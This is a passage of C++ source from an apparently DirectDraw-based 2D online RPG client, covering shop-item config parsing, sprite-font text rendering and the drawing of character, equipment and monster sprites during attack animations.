					break;
				case 15: // m_wPrice
					m_pItemForSaleList[iItemForSaleListIndex]->m_wPrice = atoi(token);
					cReadModeB = 16;
					break;
				case 16: // m_wWeight
					m_pItemForSaleList[iItemForSaleListIndex]->m_wWeight = atoi(token);
					cReadModeB = 17;
					break;
				case 17: // Appr Value
					cReadModeB = 18;
					break;
				case 18: // m_cSpeed
					m_pItemForSaleList[iItemForSaleListIndex]->m_cSpeed = atoi(token);
					cReadModeB = 19;
					break;
				case 19: // Level Limit
					m_pItemForSaleList[iItemForSaleListIndex]->m_sLevelLimit = atoi(token);
					m_pItemForSaleList[iItemForSaleListIndex]->m_dwCount = 1;
					cReadModeA = 0;
					cReadModeB = 0;
					iItemForSaleListIndex++;
					break;
				}
				break;

			default:
				break;
			}
		}else
		{	if (memcmp(token, "ItemForSale", 4) == 0)
			{	if (iItemForSaleListIndex >= DEF_MAXMENUITEMS)
				{	delete pStrTok;
					return FALSE;
				}
				cReadModeA = 1;
				cReadModeB = 1;
				m_pItemForSaleList[iItemForSaleListIndex] = new class CItem;
		}	}
		token = pStrTok->pGet();
	}
	delete pStrTok;
	if ((cReadModeA != 0) || (cReadModeB != 0)) return FALSE;
	return TRUE;
}


static char __cSpace[] = {8,8,8,8,8,8,8,8,8,8, 8,8,8,8,8, 8,6,8,7,8,8,9,10,9,7, 8,8,8,8,8, 8,8,
                          15,16,12,17,14,15,14,16,10,13, 19,10,17,17,15,14,15,16,13,17, 16,16,20,17,16,14,
	       			      8,8,8,8,8,8,	8,6,7,8,7,7,7,7,4,7,7,  4,11,7,8,8,7,8,6,5,8,9,14,8,9,8, 8,8,8,8,
				          8,8,8,8,8,8,8};
void CGame::PutString_SprFont(int iX, int iY, char * pStr, short sR, short sG, short sB)
{
 int iXpos;
 DWORD iCnt;
 DWORD dwTime = G_dwGlobalTime;
 char  cTmpStr[100];

	ZeroMemory(cTmpStr, sizeof(cTmpStr));
	strcpy(cTmpStr, pStr);
	iXpos = iX;
	for (iCnt = 0; iCnt < strlen(cTmpStr); iCnt++) {
		if ((cTmpStr[iCnt] >= 33) && (cTmpStr[iCnt] <= 122)) {
			m_pSprite[DEF_SPRID_INTERFACE_FONT1]->PutSpriteRGB(iXpos+1, iY, cTmpStr[iCnt] - 33, sR+11, sG+7, sB+6, dwTime);
			if ((sR == 0) && (sG == 0) && (sB == 0))
				 m_pSprite[DEF_SPRID_INTERFACE_FONT1]->PutSpriteFast(iXpos, iY, cTmpStr[iCnt] - 33, dwTime);
			else m_pSprite[DEF_SPRID_INTERFACE_FONT1]->PutSpriteRGB(iXpos, iY, cTmpStr[iCnt] - 33, sR, sG, sB, dwTime);
			 iXpos += __cSpace[cTmpStr[iCnt] - 33];
		}
		else iXpos += 5;
	}
}

void CGame::PutString_SprFont2(int iX, int iY, char * pStr, short sR, short sG, short sB)
{
 int iXpos, iR, iG, iB;
 DWORD iCnt;
 DWORD dwTime = G_dwGlobalTime;
 char  cTmpStr[200];

	m_DDraw.ColorTransferRGB(RGB(sR, sG, sB), &iR, &iG, &iB);

	ZeroMemory(cTmpStr, sizeof(cTmpStr));
	strcpy(cTmpStr, pStr);

	iXpos = iX;
	for (iCnt = 0; iCnt < strlen(cTmpStr); iCnt++) {
		if ((cTmpStr[iCnt] >= 33) && (cTmpStr[iCnt] <= 122)) {
			m_pSprite[DEF_SPRID_INTERFACE_FONT1]->PutSpriteFast(iXpos+1, iY, cTmpStr[iCnt] - 33, dwTime);
			m_pSprite[DEF_SPRID_INTERFACE_FONT1]->PutSpriteFast(iXpos+1, iY+1, cTmpStr[iCnt] - 33, dwTime);
			if ((sR == 0) && (sG == 0) && (sB == 0))
				 m_pSprite[DEF_SPRID_INTERFACE_FONT1]->PutSpriteFast(iXpos, iY, cTmpStr[iCnt] - 33, dwTime);
			else m_pSprite[DEF_SPRID_INTERFACE_FONT1]->PutSpriteRGB(iXpos, iY, cTmpStr[iCnt] - 33, iR, iG, iB, dwTime);
			 iXpos += __cSpace[cTmpStr[iCnt] - 33];
		}
		else iXpos += 5;
	}
}

void CGame::PutString_SprFont3(int iX, int iY, char * pStr, short sR, short sG, short sB, BOOL bTrans, int iType)
{
 int iXpos, iAdd;
 DWORD iCnt;
 DWORD dwTime = G_dwGlobalTime;
 char  cTmpStr[128];

	ZeroMemory(cTmpStr, sizeof(cTmpStr));
	strcpy(cTmpStr, pStr);

	if (iType != -1) {
		iAdd = 95*iType;
		iXpos = iX;
		for (iCnt = 0; iCnt < strlen(cTmpStr); iCnt++) {
			if ((cTmpStr[iCnt] >= 32) && (cTmpStr[iCnt] <= 126)) {

				if (bTrans == FALSE) {
					m_pSprite[DEF_SPRID_INTERFACE_SPRFONTS2]->PutSpriteFast(iXpos, iY+1, cTmpStr[iCnt] - 32 +iAdd, dwTime);
					m_pSprite[DEF_SPRID_INTERFACE_SPRFONTS2]->PutSpriteFast(iXpos+1, iY+1, cTmpStr[iCnt] - 32 +iAdd, dwTime);
					if ((sR == 0) && (sG == 0) && (sB == 0))
						 m_pSprite[DEF_SPRID_INTERFACE_SPRFONTS2]->PutSpriteFast(iXpos, iY, cTmpStr[iCnt] - 32 +iAdd, dwTime);
					else m_pSprite[DEF_SPRID_INTERFACE_SPRFONTS2]->PutSpriteRGB(iXpos, iY, cTmpStr[iCnt] - 32 +iAdd, sR, sG, sB, dwTime);

				}
				else m_pSprite[DEF_SPRID_INTERFACE_SPRFONTS2]->PutTransSpriteRGB(iXpos, iY, cTmpStr[iCnt] - 32 +iAdd, sR, sG, sB, dwTime);

				iXpos += (m_pSprite[DEF_SPRID_INTERFACE_SPRFONTS2]->m_stBrush[cTmpStr[iCnt] - 32 +iAdd].szx);
			}
			else iXpos += 5;
		}
	}
	else {
		iAdd = 0;
		iXpos = iX;
		for (iCnt = 0; iCnt < strlen(cTmpStr); iCnt++) {
			if ((cTmpStr[iCnt] >= 32) && (cTmpStr[iCnt] <= 126)) {

				if (bTrans == FALSE) {
					m_pSprite[DEF_SPRID_INTERFACE_FONT2]->PutSpriteFast(iXpos, iY+1, cTmpStr[iCnt] - 32 +iAdd, dwTime);
					m_pSprite[DEF_SPRID_INTERFACE_FONT2]->PutSpriteFast(iXpos+1, iY+1, cTmpStr[iCnt] - 32 +iAdd, dwTime);
					if ((sR == 0) && (sG == 0) && (sB == 0))
						 m_pSprite[DEF_SPRID_INTERFACE_FONT2]->PutSpriteFast(iXpos, iY, cTmpStr[iCnt] - 32 +iAdd, dwTime);
					else m_pSprite[DEF_SPRID_INTERFACE_FONT2]->PutSpriteRGB(iXpos, iY, cTmpStr[iCnt] - 32 +iAdd, sR, sG, sB, dwTime);

				}
				else m_pSprite[DEF_SPRID_INTERFACE_FONT2]->PutTransSpriteRGB(iXpos, iY, cTmpStr[iCnt] - 32 +iAdd, sR, sG, sB, dwTime);

				iXpos += (m_pSprite[DEF_SPRID_INTERFACE_FONT2]->m_stBrush[cTmpStr[iCnt] - 32 +iAdd].szx);
			}
			else iXpos += 5;
		}
	}
}

static char __cSpace2[] = {6,4,6,6,6,6,6,6,6,6,6}; //{8,6,9,8,8,9,8,8,8,8};
void CGame::PutString_SprNum(int iX, int iY, char * pStr, short sR, short sG, short sB)
{int iXpos;
 unsigned char iCnt;
 DWORD dwTime = G_dwGlobalTime;
 char  cTmpStr[200];
 WORD  wR, wG, wB;
	ZeroMemory(cTmpStr, sizeof(cTmpStr));
	strcpy(cTmpStr, pStr);
	m_Misc.ColorTransfer(m_DDraw.m_cPixelFormat, RGB(sR, sG, sB), &wR, &wG, &wB);
	iXpos = iX;
	for (iCnt = 0; iCnt < strlen(cTmpStr); iCnt++)
	{	if ((cTmpStr[iCnt] >= 0x30) && (cTmpStr[iCnt] <= 0x39))
		{	m_pSprite[DEF_SPRID_INTERFACE_ADDINTERFACE]->PutTransSprite(iXpos+2, iY, cTmpStr[iCnt] - 0x30 +6, dwTime);
			m_pSprite[DEF_SPRID_INTERFACE_ADDINTERFACE]->PutTransSprite(iXpos+1, iY+1, cTmpStr[iCnt] - 0x30 +6, dwTime);
			if ((sR == 0) && (sG == 0) && (sB == 0))
				 m_pSprite[DEF_SPRID_INTERFACE_ADDINTERFACE]->PutTransSprite(iXpos, iY, cTmpStr[iCnt] - 0x30 +6, dwTime);
			else m_pSprite[DEF_SPRID_INTERFACE_ADDINTERFACE]->PutTransSpriteRGB(iXpos, iY, cTmpStr[iCnt] - 0x30 +6, wR, wG, wB, dwTime);
			iXpos += __cSpace2[cTmpStr[iCnt] - 0x30];
	}	}
}

void CGame::PutString(int iX, int iY, char * pString, COLORREF color, BOOL bHide, char cBGtype, BOOL bIsPreDC)
{char * pTmp;
 int i;
	if (strlen(pString) == 0) return;
	if (bIsPreDC == FALSE) m_DDraw._GetBackBufferDC();
	if (bHide == FALSE)
	{	switch (cBGtype) {
		case 0:
			m_DDraw.TextOut(iX+1, iY, pString, color);
			break;
		case 1:
			m_DDraw.TextOut(iX, iY+1, pString, RGB(5,5,5));
			m_DDraw.TextOut(iX+1, iY+1, pString, RGB(5,5,5));
			m_DDraw.TextOut(iX+1, iY, pString, RGB(5,5,5));
			break;
		}
		m_DDraw.TextOut(iX, iY, pString, color);
	}else
	{ 	pTmp = new char[strlen(pString)+2];
		ZeroMemory(pTmp, strlen(pString)+2);
		strcpy(pTmp, pString);
		for (i = 0; i < (int)strlen(pString); i++)
			if (pTmp[i] != NULL) pTmp[i] = '*';

		switch (cBGtype) {
		case 0:
			m_DDraw.TextOut(iX+1, iY, pTmp, color);
			break;
		case 1:
			m_DDraw.TextOut(iX, iY+1, pTmp, RGB(5,5,5));
			m_DDraw.TextOut(iX+1, iY+1, pTmp, RGB(5,5,5));
			m_DDraw.TextOut(iX+1, iY, pTmp, RGB(5,5,5));
			break;
		}
		m_DDraw.TextOut(iX, iY, pTmp, color);
		delete[] pTmp;
	}
	if (bIsPreDC == FALSE) m_DDraw._ReleaseBackBufferDC();
}


void CGame::PutString(int iX, int iY, char * pString, COLORREF color)
{
	m_DDraw._GetBackBufferDC();
	m_DDraw.TextOut(iX, iY, pString, color);
	m_DDraw._ReleaseBackBufferDC();
}

void CGame::PutString2(int iX, int iY, char * pString, short sR, short sG, short sB)
{
	m_DDraw._GetBackBufferDC();
	m_DDraw.TextOut(iX+1, iY, pString, RGB(0, 0, 0));
	m_DDraw.TextOut(iX, iY+1, pString, RGB(0, 0, 0));
	m_DDraw.TextOut(iX+1, iY+1, pString, RGB(0, 0, 0));
	m_DDraw.TextOut(iX, iY, pString, RGB(sR, sG, sB));
	m_DDraw._ReleaseBackBufferDC();
}

void CGame::PutAlignedString(int iX1, int iX2, int iY, char * pString, short sR, short sG, short sB)
{
	RECT rt;
	m_DDraw._GetBackBufferDC();
	SetRect(&rt, iX1, iY, iX2, iY+15);
	m_DDraw.DrawText(&rt, pString, RGB(sR, sG, sB));
	m_DDraw._ReleaseBackBufferDC();
}

BOOL   CGame::DrawObject_OnAttack(int indexX, int indexY, int sX, int sY, BOOL bTrans, DWORD dwTime, int msX, int msY)
{int iBodyIndex, iUndiesIndex, iHairIndex, iArmArmorIndex, iBodyArmorIndex, iPantsIndex, iBootsIndex, iHelmIndex, iR, iG, iB;
 int iWeaponIndex, iWeapon, iAdd, iShieldIndex, iMantleIndex; 
 int iWeaponGlare, iShieldGlare;
 int iWeaponColor, iShieldColor, iArmorColor, iMantleColor, iArmColor, iPantsColor, iBootsColor, iHelmColor;
 int iSkirtDraw = 0;
 BOOL bInvy = FALSE;

	bInv = FALSE;

	if(_tmp_sOwnerType == 35 || _tmp_sOwnerType == 81) bInvy = TRUE; //Energy-Ball,Wyvern

	if (m_cDetailLevel == 0)
	{	iWeaponColor = 0;
		iShieldColor = 0;
		iArmorColor  = 0;
		iMantleColor = 0;
		iArmColor    = 0;
		iPantsColor  = 0;
		iBootsColor  = 0;
		iHelmColor   = 0;
	}else
	{	iWeaponColor = (_tmp_iApprColor & 0xF0000000) >> 28;
		iShieldColor = (_tmp_iApprColor & 0x0F000000) >> 24;
		iArmorColor  = (_tmp_iApprColor & 0x00F00000) >> 20;
		iMantleColor = (_tmp_iApprColor & 0x000F0000) >> 16;
		iArmColor    = (_tmp_iApprColor & 0x0000F000) >> 12;
		iPantsColor  = (_tmp_iApprColor & 0x00000F00) >> 8;
		iBootsColor  = (_tmp_iApprColor & 0x000000F0) >> 4;
		iHelmColor   = (_tmp_iApprColor & 0x0000000F);
	}
	iWeaponGlare = (_tmp_sAppr4 & 0x000C) >> 2;
	iShieldGlare = (_tmp_sAppr4 & 0x0003);
	if ( (_tmp_iStatus & 0x10) != 0)
	{	if (memcmp(m_cPlayerName, _tmp_cName, 10) == 0) bInvy = TRUE;
		else if (bCheckItemEquiped("NecklaceOfBeholder") == true) bInvy = TRUE; //beholder neck
		else if( _iGetFOE(_tmp_iStatus) == 1 ) bInvy = TRUE;
		else return FALSE;
	}
	switch (_tmp_sOwnerType) {
	case 1:
	case 2:
	case 3:
		if ((_tmp_sAppr2 & 0xF000) != 0) {
			iWeapon = ((_tmp_sAppr2 & 0x0FF0) >> 4);
			if (iWeapon == 0) iAdd = 6;
			if ((iWeapon >= 1)  && (iWeapon <= 39)) iAdd = 6;
			if ((iWeapon >= 40) && (iWeapon <= 59)) iAdd = 7;
			iBodyIndex   = 500 + (_tmp_sOwnerType - 1 )*8*15 + (iAdd * 8);
			iUndiesIndex = DEF_SPRID_UNDIES_M + (_tmp_sAppr1 & 0x000F)*15 + iAdd;
			iHairIndex	 = DEF_SPRID_HAIR_M + ((_tmp_sAppr1 & 0x0F00) >> 8)*15 + iAdd;
			if ((_tmp_sAppr4 & 0x80) == 0)
			{	if (((_tmp_sAppr3 & 0xF000) >> 12) == 0)
					 iBodyArmorIndex = -1;
				else iBodyArmorIndex = DEF_SPRID_BODYARMOR_M + ((_tmp_sAppr3 & 0xF000) >> 12)*15 + iAdd;
			}
			if ((_tmp_sAppr3 & 0x000F) == 0)
				 iArmArmorIndex = -1;
			else iArmArmorIndex = DEF_SPRID_BERK_M + (_tmp_sAppr3 & 0x000F)*15 + iAdd;
			if ((_tmp_sAppr3 & 0x0F00) == 0)
				 iPantsIndex = -1;
			else iPantsIndex = DEF_SPRID_LEGG_M + ((_tmp_sAppr3 & 0x0F00) >> 8)*15 + iAdd;
			if (((_tmp_sAppr4 & 0xF000) >> 12) == 0)
				 iBootsIndex = -1;
			else iBootsIndex = DEF_SPRID_BOOT_M + ((_tmp_sAppr4 & 0xF000) >> 12)*15 + iAdd;
			if (((_tmp_sAppr2 & 0x0FF0) >> 4) == 0)
				iWeaponIndex = -1;
			else iWeaponIndex = DEF_SPRID_WEAPON_M + ((_tmp_sAppr2 & 0x0FF0) >> 4)*64 + 8*4 + (_tmp_cDir - 1);
			if ((_tmp_sAppr2 & 0x000F) == 0)
				iShieldIndex = -1;
			else iShieldIndex = DEF_SPRID_SHIELD_M + (_tmp_sAppr2 & 0x000F)*8 + 4;
			if ((_tmp_sAppr4 & 0x0F00) == 0)
				 iMantleIndex = -1;
			else iMantleIndex = DEF_SPRID_MANTLE_M + ((_tmp_sAppr4 & 0x0F00) >> 8)*15 + iAdd;
			if ((_tmp_sAppr3 & 0x00F0) == 0)
				 iHelmIndex = -1;
			else iHelmIndex = DEF_SPRID_HEAD_M + ((_tmp_sAppr3 & 0x00F0) >> 4)*15 + iAdd;
		}else
		{	iBodyIndex   = 500  + (_tmp_sOwnerType - 1 )*8*15 + (5 * 8);
			iUndiesIndex = DEF_SPRID_UNDIES_M + (_tmp_sAppr1 & 0x000F)*15 + 5;
			iHairIndex	 = DEF_SPRID_HAIR_M + ((_tmp_sAppr1 & 0x0F00) >> 8)*15 + 5;
			if ((_tmp_sAppr4 & 0x80) == 0)
			{	if (((_tmp_sAppr3 & 0xF000) >> 12) == 0)
					 iBodyArmorIndex = -1;
				else iBodyArmorIndex = DEF_SPRID_BODYARMOR_M + ((_tmp_sAppr3 & 0xF000) >> 12)*15 + 5;
			}
			if ((_tmp_sAppr3 & 0x000F) == 0)
				 iArmArmorIndex = -1;
			else iArmArmorIndex = DEF_SPRID_BERK_M + (_tmp_sAppr3 & 0x000F)*15 + 5;
			if ((_tmp_sAppr3 & 0x0F00) == 0)
				 iPantsIndex = -1;
			else iPantsIndex = DEF_SPRID_LEGG_M + ((_tmp_sAppr3 & 0x0F00) >> 8)*15 + 5;
			if (((_tmp_sAppr4 & 0xF000) >> 12) == 0)
				 iBootsIndex = -1;
			else iBootsIndex = DEF_SPRID_BOOT_M + ((_tmp_sAppr4 & 0xF000) >> 12)*15 + 5;
			if ((_tmp_sAppr4 & 0x0F00) == 0)
				 iMantleIndex = -1;
			else iMantleIndex = DEF_SPRID_MANTLE_M + ((_tmp_sAppr4 & 0x0F00) >> 8)*15 + 5;
			if ((_tmp_sAppr3 & 0x00F0) == 0)
				 iHelmIndex = -1;
			else iHelmIndex = DEF_SPRID_HEAD_M + ((_tmp_sAppr3 & 0x00F0) >> 4)*15 + 5;
			iWeaponIndex = -1;
			iShieldIndex = -1;
		}
		break;

	case 4:
	case 5:
	case 6:
		if (((_tmp_sAppr3 & 0x0F00) >> 8) == 1) iSkirtDraw = 1;
		if ((_tmp_sAppr2 & 0xF000) != 0)
		{	iWeapon = ((_tmp_sAppr2 & 0x0FF0) >> 4);
			if (iWeapon == 0) iAdd = 6;
			if ((iWeapon >= 1)  && (iWeapon <= 39)) iAdd = 6;
			if ((iWeapon >= 40) && (iWeapon <= 59)) iAdd = 7;
			iBodyIndex   = 500 + (_tmp_sOwnerType - 1 )*8*15 + (iAdd * 8);
			iUndiesIndex = DEF_SPRID_UNDIES_W + (_tmp_sAppr1 & 0x000F)*15 + iAdd;
			iHairIndex	 = DEF_SPRID_HAIR_W + ((_tmp_sAppr1 & 0x0F00) >> 8)*15 + iAdd;
			if ((_tmp_sAppr4 & 0x80) == 0)
			{	if (((_tmp_sAppr3 & 0xF000) >> 12) == 0)
					 iBodyArmorIndex = -1;
				else iBodyArmorIndex = DEF_SPRID_BODYARMOR_W + ((_tmp_sAppr3 & 0xF000) >> 12)*15 + iAdd;
			}
			if ((_tmp_sAppr3 & 0x000F) == 0)
				 iArmArmorIndex = -1;
			else iArmArmorIndex = DEF_SPRID_BERK_W + (_tmp_sAppr3 & 0x000F)*15 + iAdd;
			if ((_tmp_sAppr3 & 0x0F00) == 0)
				 iPantsIndex = -1;
			else iPantsIndex = DEF_SPRID_LEGG_W + ((_tmp_sAppr3 & 0x0F00) >> 8)*15 + iAdd;
			if (((_tmp_sAppr4 & 0xF000) >> 12) == 0)
				 iBootsIndex = -1;
			else iBootsIndex = DEF_SPRID_BOOT_W + ((_tmp_sAppr4 & 0xF000) >> 12)*15 + iAdd;
			if (((_tmp_sAppr2 & 0x0FF0) >> 4) == 0)
				iWeaponIndex = -1;
			else iWeaponIndex = DEF_SPRID_WEAPON_W + ((_tmp_sAppr2 & 0x0FF0) >> 4)*64 + 8*4 + (_tmp_cDir - 1);
			if ((_tmp_sAppr2 & 0x000F) == 0)
				iShieldIndex = -1;
			else iShieldIndex = DEF_SPRID_SHIELD_W + (_tmp_sAppr2 & 0x000F)*8 + 4;
			if ((_tmp_sAppr4 & 0x0F00) == 0)
				 iMantleIndex = -1;
			else iMantleIndex = DEF_SPRID_MANTLE_W + ((_tmp_sAppr4 & 0x0F00) >> 8)*15 + iAdd;
			if ((_tmp_sAppr3 & 0x00F0) == 0)
				 iHelmIndex = -1;
			else iHelmIndex = DEF_SPRID_HEAD_W + ((_tmp_sAppr3 & 0x00F0) >> 4)*15 + iAdd;
		}else
		{	iBodyIndex   = 500  + (_tmp_sOwnerType - 1 )*8*15 + (5 * 8);
			iUndiesIndex = DEF_SPRID_UNDIES_W + (_tmp_sAppr1 & 0x000F)*15 + 5;
			iHairIndex	 = DEF_SPRID_HAIR_W + ((_tmp_sAppr1 & 0x0F00) >> 8)*15 + 5;
			if ((_tmp_sAppr4 & 0x80) == 0)
			{	if (((_tmp_sAppr3 & 0xF000) >> 12) == 0)
					 iBodyArmorIndex = -1;
				else iBodyArmorIndex = DEF_SPRID_BODYARMOR_W + ((_tmp_sAppr3 & 0xF000) >> 12)*15 + 5;
			}
			if ((_tmp_sAppr3 & 0x000F) == 0)
				 iArmArmorIndex = -1;
			else iArmArmorIndex = DEF_SPRID_BERK_W + (_tmp_sAppr3 & 0x000F)*15 + 5;
			if ((_tmp_sAppr3 & 0x0F00) == 0)
				 iPantsIndex = -1;
			else iPantsIndex = DEF_SPRID_LEGG_W + ((_tmp_sAppr3 & 0x0F00) >> 8)*15 + 5;
			if (((_tmp_sAppr4 & 0xF000) >> 12) == 0)
				 iBootsIndex = -1;
			else iBootsIndex = DEF_SPRID_BOOT_W + ((_tmp_sAppr4 & 0xF000) >> 12)*15 + 5;
			if ((_tmp_sAppr4 & 0x0F00) == 0)
				 iMantleIndex = -1;
			else iMantleIndex = DEF_SPRID_MANTLE_W + ((_tmp_sAppr4 & 0x0F00) >> 8)*15 + 5;
			if ((_tmp_sAppr3 & 0x00F0) == 0)
				 iHelmIndex = -1;
			else iHelmIndex = DEF_SPRID_HEAD_W + ((_tmp_sAppr3 & 0x00F0) >> 4)*15 + 5;
			iWeaponIndex = -1;
			iShieldIndex = -1;
		}
		break;

	default:
		if (_tmp_sAppr2 != 0)
		{	 iBodyIndex = DEF_SPRID_MOB +  (_tmp_sOwnerType - 10 )*8*7 + (4 * 8);
			 _tmp_cFrame = _tmp_sAppr2 -1;
		}
		else if (_tmp_sOwnerType == 66) iBodyIndex = DEF_SPRID_MOB +  (_tmp_sOwnerType - 10 )*8*7 + (0 * 8);
		else if (_tmp_sOwnerType == 73) iBodyIndex = DEF_SPRID_MOB +  (_tmp_sOwnerType - 10 )*8*7 + (0 * 8);
		else if (_tmp_sOwnerType == 86) iBodyIndex = DEF_SPRID_MOB +  (_tmp_sOwnerType - 10 )*8*7 + (1 * 8);
		else if (_tmp_sOwnerType == 87) iBodyIndex = DEF_SPRID_MOB +  (_tmp_sOwnerType - 10 )*8*7 + (1 * 8);
		else if (_tmp_sOwnerType == 89) iBodyIndex = DEF_SPRID_MOB +  (_tmp_sOwnerType - 10 )*8*7 + (1 * 8);
		else iBodyIndex =  DEF_SPRID_MOB +  (_tmp_sOwnerType - 10 )*8*7 + (2 * 8);
		iUndiesIndex    = -1;
		iHairIndex      = -1;
		iBodyArmorIndex = -1;
		iArmArmorIndex  = -1;
		iBootsIndex     = -1;
		iPantsIndex     = -1;
		iWeaponIndex    = -1;
		iShieldIndex    = -1;
		iMantleIndex    = -1;
		iHelmIndex      = -1;
		break;
	}
	if (m_bIsCrusadeMode || m_bIsHeldenian) DrawObjectFOE(sX, sY, _tmp_cFrame);
	if (_tmp_iEffectType != 0)
	{	switch (_tmp_iEffectType) {
		case 1: m_pEffectSpr[26]->PutTransSprite(sX, sY, _tmp_iEffectFrame, dwTime); break; // Special Ability: Attack Effect
		case 2: m_pEffectSpr[27]->PutTransSprite(sX, sY, _tmp_iEffectFrame, dwTime); break; // Special Ability: Protect Effect
	}	}

	if (bTrans == FALSE)
	{	CheckActiveAura(sX, sY, dwTime, _tmp_sOwnerType);
		if (_cDrawingOrder[_tmp_cDir] == 1)
		{	if (iWeaponIndex != -1)
			{	if (iWeaponColor == 0)
				{	m_pSprite[iWeaponIndex]->PutSpriteFast(sX, sY, _tmp_cFrame, dwTime);
				}else
				{	m_pSprite[iWeaponIndex]->PutSpriteRGB(sX, sY,  _tmp_cFrame, m_wWR[iWeaponColor] -m_wR[0], m_wWG[iWeaponColor] -m_wG[0], m_wWB[iWeaponColor] -m_wB[0], dwTime);
				}
				DKGlare(iWeaponColor, iWeaponIndex, &iWeaponGlare);
				switch (iWeaponGlare) {
				case 0: break;
				case 1: m_pSprite[iWeaponIndex]->PutTransSpriteRGB(sX, sY,  _tmp_cFrame, m_iDrawFlag, 0, 0, dwTime); break; // Red Glare
				case 2: m_pSprite[iWeaponIndex]->PutTransSpriteRGB(sX, sY,  _tmp_cFrame, 0, m_iDrawFlag, 0, dwTime); break; // Green Glare
				case 3: m_pSprite[iWeaponIndex]->PutTransSpriteRGB(sX, sY,  _tmp_cFrame, 0, 0, m_iDrawFlag, dwTime); break; // Blue Glare
				}
				if (_tmp_cFrame == 3) m_pSprite[iWeaponIndex]->PutTransSpriteRGB(sX, sY, _tmp_cFrame -1, m_wR[10] -(m_wR[0]/3), m_wG[10] -(m_wG[0]/3), m_wB[10] -(m_wB[0]/3), dwTime);
			}
			switch (_tmp_sOwnerType) { // Pas d'ombre pour ces mobs
			case 10: // Slime
			case 35: // Energy Sphere
			
			case 81: // Abaddon
			case 91: // Gate
				break;
			default:
				if (m_cDetailLevel != 0)
				{	if (sX < 50)
						 m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutShadowSpriteClip(sX, sY, _tmp_cFrame, dwTime);
					else m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutShadowSprite(sX, sY, _tmp_cFrame, dwTime);
				}
				break;
			}
			if (_tmp_sOwnerType == 35)
				m_pEffectSpr[0]->PutTransSprite(sX, sY, 1, dwTime);

			if (_tmp_sOwnerType == 81) // Abaddon
			{	m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutTransSprite(sX, sY, _tmp_cFrame, dwTime);
			}else if (bInvy == TRUE)
				m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutTransSprite(sX, sY, _tmp_cFrame, dwTime);
			else
			{	if ((_tmp_iStatus & 0x40) != 0)
					 m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutSpriteRGB(sX, sY, _tmp_cFrame, m_wR[10] -m_wR[0]/2, m_wG[10] -m_wG[0]/2, m_wB[10] -m_wB[0]/2, dwTime);
				else m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutSpriteFast(sX, sY, _tmp_cFrame, dwTime);
			}
			SetRect(&m_rcBodyRect, m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.left, m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.top,
				    m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.right, m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.bottom);

			if ((iMantleIndex != -1) && (_cMantleDrawingOrder[_tmp_cDir] == 0))
			{	if (iMantleColor == 0)
					 m_pSprite[iMantleIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else m_pSprite[iMantleIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iMantleColor] -m_wR[0], m_wG[iMantleColor] -m_wG[0], m_wB[iMantleColor] -m_wB[0], dwTime);
			}

			if (iUndiesIndex != -1) m_pSprite[iUndiesIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);

			if ((iHairIndex   != -1) && (iHelmIndex == -1))
			{	_GetHairColorRGB(((_tmp_sAppr1 & 0x00F0) >> 4), &iR, &iG, &iB);
				m_pSprite[iHairIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, iR, iG, iB, dwTime);
			}

			if ((iBootsIndex != -1) && (iSkirtDraw == 1))
			{	if (iBootsColor == 0)
					 m_pSprite[iBootsIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else m_pSprite[iBootsIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iBootsColor] -m_wR[0], m_wG[iBootsColor] -m_wG[0], m_wB[iBootsColor] -m_wB[0], dwTime);
			}

			if (iPantsIndex != -1)
			{	if (iPantsColor == 0)
					 m_pSprite[iPantsIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else m_pSprite[iPantsIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iPantsColor] -m_wR[0], m_wG[iPantsColor] -m_wG[0], m_wB[iPantsColor] -m_wB[0], dwTime);
			}

			if (iArmArmorIndex != -1)
			{	if (iArmColor == 0)
					 m_pSprite[iArmArmorIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else m_pSprite[iArmArmorIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iArmColor] -m_wR[0], m_wG[iArmColor] -m_wG[0], m_wB[iArmColor] -m_wB[0], dwTime);
			}

			if ((iBootsIndex != -1) && (iSkirtDraw == 0))
			{	if (iBootsColor == 0)
					 m_pSprite[iBootsIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else m_pSprite[iBootsIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iBootsColor] -m_wR[0], m_wG[iBootsColor] -m_wG[0], m_wB[iBootsColor] -m_wB[0], dwTime);
			}

			if (iBodyArmorIndex != -1)
			{	if (iArmorColor == 0)
					 m_pSprite[iBodyArmorIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else m_pSprite[iBodyArmorIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iArmorColor] -m_wR[0], m_wG[iArmorColor] -m_wG[0], m_wB[iArmorColor] -m_wB[0], dwTime);
			}

			if (iHelmIndex != -1)
			{	if (iHelmColor == 0)
					 m_pSprite[iHelmIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
